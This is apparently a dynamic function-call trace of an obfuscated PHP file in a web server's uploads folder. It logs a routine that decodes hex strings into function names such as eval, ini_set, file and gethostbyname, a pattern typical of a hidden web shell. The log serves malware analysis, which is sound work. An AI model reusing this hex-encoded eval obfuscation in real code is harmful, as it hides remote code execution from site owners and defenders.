2		A						/var/www/html/uploads/lCT.php	202	$len = 25
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	815	0	0.031559	721280	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'67'
3	815	1	0.031583	721328
3	815	R			103
3	816	0	0.031607	721248	chr	0		/var/www/html/uploads/lCT.php	204	1	103
3	816	1	0.031640	721288
3	816	R			'g'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'g'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	817	0	0.031701	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	817	1	0.031722	721360
3	817	R			101
3	818	0	0.031746	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	818	1	0.031767	721320
3	818	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	819	0	0.031825	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	819	1	0.031843	721360
3	819	R			116
3	820	0	0.031868	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	820	1	0.031888	721320
3	820	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	821	0	0.031944	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'68'
3	821	1	0.031967	721360
3	821	R			104
3	822	0	0.031992	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	104
3	822	1	0.032012	721320
3	822	R			'h'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'h'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	823	0	0.032070	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	823	1	0.032092	721360
3	823	R			111
3	824	0	0.032114	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	824	1	0.032129	721320
3	824	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	825	0	0.032169	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	825	1	0.032180	721360
3	825	R			115
3	826	0	0.032193	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	826	1	0.032205	721320
3	826	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	827	0	0.032235	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	827	1	0.032247	721360
3	827	R			116
3	828	0	0.032259	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	828	1	0.032271	721320
3	828	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	829	0	0.032301	721312	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	829	1	0.032313	721360
3	829	R			98
3	830	0	0.032326	721280	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	830	1	0.032336	721320
3	830	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	831	0	0.032367	721320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'79'
3	831	1	0.032378	721368
3	831	R			121
3	832	0	0.032390	721288	chr	0		/var/www/html/uploads/lCT.php	204	1	121
3	832	1	0.032402	721328
3	832	R			'y'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'y'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	833	0	0.032432	721320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	833	1	0.032444	721368
3	833	R			110
3	834	0	0.032456	721288	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	834	1	0.032468	721328
3	834	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	835	0	0.032498	721320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	835	1	0.032509	721368
3	835	R			97
3	836	0	0.032521	721288	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	836	1	0.032532	721328
3	836	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	837	0	0.032562	721320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6d'
3	837	1	0.032574	721368
3	837	R			109
3	838	0	0.032586	721288	chr	0		/var/www/html/uploads/lCT.php	204	1	109
3	838	1	0.032604	721328
3	838	R			'm'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'm'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	839	0	0.032635	721320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	839	1	0.032646	721368
3	839	R			101
3	840	0	0.032659	721288	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	840	1	0.032670	721328
3	840	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	814	1	0.032700	721288
2	814	R			'gethostbyname'
1		A						/var/www/html/uploads/lCT.php	7	$func[40] = 'gethostbyname'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	841	0	0.032738	721288	dehex	1		/var/www/html/uploads/lCT.php	7	1	'737562737472'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	842	0	0.032780	721320	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	842	1	0.032792	721368
3	842	R			115
3	843	0	0.032804	721288	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	843	1	0.032816	721328
3	843	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	844	0	0.032847	721352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'75'
3	844	1	0.032858	721400
3	844	R			117
3	845	0	0.032871	721320	chr	0		/var/www/html/uploads/lCT.php	204	1	117
3	845	1	0.032882	721360
3	845	R			'u'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'u'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	846	0	0.032913	721352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	846	1	0.032923	721400
3	846	R			98
3	847	0	0.032936	721320	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	847	1	0.032947	721360
3	847	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	848	0	0.032977	721352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	848	1	0.032988	721400
3	848	R			115
3	849	0	0.033001	721320	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	849	1	0.033012	721360
3	849	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	850	0	0.033042	721352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	850	1	0.033053	721400
3	850	R			116
3	851	0	0.033066	721320	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	851	1	0.033077	721360
3	851	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	852	0	0.033107	721352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	852	1	0.033118	721400
3	852	R			114
3	853	0	0.033131	721320	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	853	1	0.033142	721360
3	853	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	841	1	0.033193	721320
2	841	R			'substr'
1		A						/var/www/html/uploads/lCT.php	7	$func[41] = 'substr'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	854	0	0.033227	721320	dehex	1		/var/www/html/uploads/lCT.php	7	1	'737472737472'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 11
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	855	0	0.033267	721352	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	855	1	0.033279	721400
3	855	R			115
3	856	0	0.033291	721320	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	856	1	0.033303	721360
3	856	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	857	0	0.033333	721384	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	857	1	0.033345	721432
3	857	R			116
3	858	0	0.033357	721352	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	858	1	0.033372	721392
3	858	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	859	0	0.033403	721384	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	859	1	0.033414	721432
3	859	R			114
3	860	0	0.033426	721352	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	860	1	0.033436	721392
3	860	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	861	0	0.033467	721384	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	861	1	0.033477	721432
3	861	R			115
3	862	0	0.033490	721352	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	862	1	0.033501	721392
3	862	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	863	0	0.033531	721384	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	863	1	0.033542	721432
3	863	R			116
3	864	0	0.033554	721352	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	864	1	0.033566	721392
3	864	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	865	0	0.033596	721384	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	865	1	0.033607	721432
3	865	R			114
3	866	0	0.033619	721352	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	866	1	0.033630	721392
3	866	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	854	1	0.033660	721352
2	854	R			'strstr'
1		A						/var/www/html/uploads/lCT.php	7	$func[42] = 'strstr'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	867	0	0.033694	721352	dehex	1		/var/www/html/uploads/lCT.php	7	1	'696e695f736574'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	868	0	0.033734	721384	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	868	1	0.033746	721432
3	868	R			105
3	869	0	0.033758	721352	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	869	1	0.033769	721392
3	869	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	870	0	0.033800	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6e'
3	870	1	0.033811	721464
3	870	R			110
3	871	0	0.033824	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	110
3	871	1	0.033835	721424
3	871	R			'n'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'n'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	872	0	0.033865	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	872	1	0.033876	721464
3	872	R			105
3	873	0	0.033888	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	873	1	0.033899	721424
3	873	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	874	0	0.033929	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	874	1	0.033940	721464
3	874	R			95
3	875	0	0.033953	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	875	1	0.033964	721424
3	875	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	876	0	0.033994	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	876	1	0.034005	721464
3	876	R			115
3	877	0	0.034017	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	877	1	0.034029	721424
3	877	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	878	0	0.034059	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	878	1	0.034070	721464
3	878	R			101
3	879	0	0.034082	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	879	1	0.034097	721424
3	879	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	880	0	0.034127	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	880	1	0.034138	721464
3	880	R			116
3	881	0	0.034151	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	881	1	0.034162	721424
3	881	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	867	1	0.034192	721384
2	867	R			'ini_set'
1		A						/var/www/html/uploads/lCT.php	7	$func[43] = 'ini_set'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	882	0	0.034226	721384	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66696c65'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	883	0	0.034266	721416	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
3	883	1	0.034277	721464
3	883	R			102
3	884	0	0.034289	721384	chr	0		/var/www/html/uploads/lCT.php	204	1	102
3	884	1	0.034300	721424
3	884	R			'f'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'f'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	885	0	0.034330	721448	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'69'
3	885	1	0.034341	721496
3	885	R			105
3	886	0	0.034354	721416	chr	0		/var/www/html/uploads/lCT.php	204	1	105
3	886	1	0.034365	721456
3	886	R			'i'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'i'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	887	0	0.034403	721448	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	887	1	0.034415	721496
3	887	R			108
3	888	0	0.034428	721416	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	888	1	0.034439	721456
3	888	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	889	0	0.034469	721448	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	889	1	0.034480	721496
3	889	R			101
3	890	0	0.034492	721416	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	890	1	0.034503	721456
3	890	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	882	1	0.034533	721416
2	882	R			'file'
1		A						/var/www/html/uploads/lCT.php	7	$func[44] = 'file'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	891	0	0.034567	721416	dehex	1		/var/www/html/uploads/lCT.php	7	1	'7374725f7265706c616365'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 21
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	892	0	0.034608	721448	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	892	1	0.034619	721496
3	892	R			115
3	893	0	0.034632	721416	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	893	1	0.034643	721456
3	893	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	894	0	0.034673	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	894	1	0.034684	721528
3	894	R			116
3	895	0	0.034696	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	895	1	0.034707	721488
3	895	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	896	0	0.034738	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	896	1	0.034749	721528
3	896	R			114
3	897	0	0.034761	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	897	1	0.034773	721488
3	897	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	898	0	0.034803	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	898	1	0.034815	721528
3	898	R			95
3	899	0	0.034831	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	899	1	0.034842	721488
3	899	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	900	0	0.034873	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	900	1	0.034884	721528
3	900	R			114
3	901	0	0.034897	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	901	1	0.034908	721488
3	901	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	902	0	0.034938	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	902	1	0.034949	721528
3	902	R			101
3	903	0	0.034962	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	903	1	0.034974	721488
3	903	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	904	0	0.035004	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	904	1	0.035015	721528
3	904	R			112
3	905	0	0.035028	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	905	1	0.035040	721488
3	905	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	906	0	0.035070	721480	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	906	1	0.035082	721528
3	906	R			108
3	907	0	0.035094	721448	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	907	1	0.035105	721488
3	907	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	908	0	0.035135	721488	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	908	1	0.035146	721536
3	908	R			97
3	909	0	0.035159	721456	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	909	1	0.035169	721496
3	909	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	910	0	0.035199	721488	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'63'
3	910	1	0.035211	721536
3	910	R			99
3	911	0	0.035223	721456	chr	0		/var/www/html/uploads/lCT.php	204	1	99
3	911	1	0.035234	721496
3	911	R			'c'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'c'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	912	0	0.035264	721488	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	912	1	0.035275	721536
3	912	R			101
3	913	0	0.035287	721456	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	913	1	0.035298	721496
3	913	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	891	1	0.035328	721456
2	891	R			'str_replace'
1		A						/var/www/html/uploads/lCT.php	7	$func[45] = 'str_replace'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	914	0	0.035362	721456	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6578706c6f6465'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 13
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	915	0	0.035403	721488	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	915	1	0.035414	721536
3	915	R			101
3	916	0	0.035427	721456	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	916	1	0.035439	721496
3	916	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	917	0	0.035469	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'78'
3	917	1	0.035480	721568
3	917	R			120
3	918	0	0.035493	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	120
3	918	1	0.035503	721528
3	918	R			'x'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'x'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	919	0	0.035534	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'70'
3	919	1	0.035545	721568
3	919	R			112
3	920	0	0.035565	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	112
3	920	1	0.035576	721528
3	920	R			'p'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'p'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	921	0	0.035607	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	921	1	0.035618	721568
3	921	R			108
3	922	0	0.035631	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	922	1	0.035642	721528
3	922	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	923	0	0.035673	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	923	1	0.035685	721568
3	923	R			111
3	924	0	0.035697	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	924	1	0.035709	721528
3	924	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	925	0	0.035739	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'64'
3	925	1	0.035749	721568
3	925	R			100
3	926	0	0.035762	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	100
3	926	1	0.035773	721528
3	926	R			'd'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'd'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	927	0	0.035803	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	927	1	0.035814	721568
3	927	R			101
3	928	0	0.035826	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	928	1	0.035837	721528
3	928	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	914	1	0.035868	721488
2	914	R			'explode'
1		A						/var/www/html/uploads/lCT.php	7	$func[46] = 'explode'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	929	0	0.035902	721488	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6576616c'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 7
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	930	0	0.035942	721520	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'65'
3	930	1	0.035954	721568
3	930	R			101
3	931	0	0.035966	721488	chr	0		/var/www/html/uploads/lCT.php	204	1	101
3	931	1	0.035977	721528
3	931	R			'e'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'e'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	932	0	0.036007	721552	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'76'
3	932	1	0.036019	721600
3	932	R			118
3	933	0	0.036032	721520	chr	0		/var/www/html/uploads/lCT.php	204	1	118
3	933	1	0.036043	721560
3	933	R			'v'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'v'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	934	0	0.036074	721552	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	934	1	0.036085	721600
3	934	R			97
3	935	0	0.036098	721520	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	935	1	0.036108	721560
3	935	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	936	0	0.036139	721552	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6c'
3	936	1	0.036150	721600
3	936	R			108
3	937	0	0.036162	721520	chr	0		/var/www/html/uploads/lCT.php	204	1	108
3	937	1	0.036174	721560
3	937	R			'l'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'l'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	929	1	0.036204	721520
2	929	R			'eval'
1		A						/var/www/html/uploads/lCT.php	7	$func[47] = 'eval'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	938	0	0.036237	721520	dehex	1		/var/www/html/uploads/lCT.php	7	1	'6f625f7374617274'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 15
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	939	0	0.036278	721552	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'6f'
3	939	1	0.036292	721600
3	939	R			111
3	940	0	0.036305	721520	chr	0		/var/www/html/uploads/lCT.php	204	1	111
3	940	1	0.036315	721560
3	940	R			'o'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'o'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	941	0	0.036346	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'62'
3	941	1	0.036357	721632
3	941	R			98
3	942	0	0.036369	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	98
3	942	1	0.036380	721592
3	942	R			'b'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'b'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	943	0	0.036411	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'5f'
3	943	1	0.036422	721632
3	943	R			95
3	944	0	0.036435	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	95
3	944	1	0.036445	721592
3	944	R			'_'
2		A						/var/www/html/uploads/lCT.php	204	$r .= '_'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	945	0	0.036476	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'73'
3	945	1	0.036487	721632
3	945	R			115
3	946	0	0.036500	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	115
3	946	1	0.036511	721592
3	946	R			's'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 's'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	947	0	0.036542	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	947	1	0.036553	721632
3	947	R			116
3	948	0	0.036565	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	948	1	0.036576	721592
3	948	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	949	0	0.036606	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'61'
3	949	1	0.036617	721632
3	949	R			97
3	950	0	0.036630	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	97
3	950	1	0.036641	721592
3	950	R			'a'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'a'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	951	0	0.036671	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'72'
3	951	1	0.036682	721632
3	951	R			114
3	952	0	0.036694	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	114
3	952	1	0.036705	721592
3	952	R			'r'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 'r'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
3	953	0	0.036736	721584	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'74'
3	953	1	0.036746	721632
3	953	R			116
3	954	0	0.036759	721552	chr	0		/var/www/html/uploads/lCT.php	204	1	116
3	954	1	0.036769	721592
3	954	R			't'
2		A						/var/www/html/uploads/lCT.php	204	$r .= 't'
2		A						/var/www/html/uploads/lCT.php	203	$i += 2
2	938	1	0.036799	721560
2	938	R			'ob_start'
1		A						/var/www/html/uploads/lCT.php	7	$func[48] = 'ob_start'
1		A						/var/www/html/uploads/lCT.php	6	$i++
2	955	0	0.036833	721560	dehex	1		/var/www/html/uploads/lCT.php	7	1	'66756e6374696f6e5f657869737473'
2		A						/var/www/html/uploads/lCT.php	201	$r = ''
2		A						/var/www/html/uploads/lCT.php	202	$len = 29
2		A						/var/www/html/uploads/lCT.php	203	$i = 0
3	956	0	0.036874	721592	hexdec	0		/var/www/html/uploads/lCT.php	204	1	'66'
